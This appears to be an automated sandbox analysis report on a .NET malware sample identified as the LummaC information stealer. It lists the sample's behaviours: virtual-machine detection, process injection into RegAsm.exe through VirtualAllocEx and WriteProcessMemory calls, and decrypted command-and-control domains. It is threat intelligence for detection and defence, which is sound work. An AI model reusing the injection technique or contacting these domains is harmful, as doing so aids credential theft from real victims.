Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6692	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6720	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`3
Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1252293838.0000000000A03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00433FA0 LdrInitializeThunk,

3_2_00433FA0

Enables debug privileges

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, massiv, bufferSize, ref bytesRead)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: miracledzmnqwui.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 438000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C2A008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

ID:	1500506
Product:	CloudBasic
Start time:	15:28:07
Start date:	28.08.2024
Sample:	SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	876c12019e3b15fe92841e8d358d4921
SHA1:	08e3fb4496270b4ab04d5adee71fefdb670114a1
SHA256:	b8738d4888209ef2912d232eafbd13a0017bb62761a9f5d567c3fa0090a09972
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Windows Analysis Report
SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Malware Threat Intel
Provided by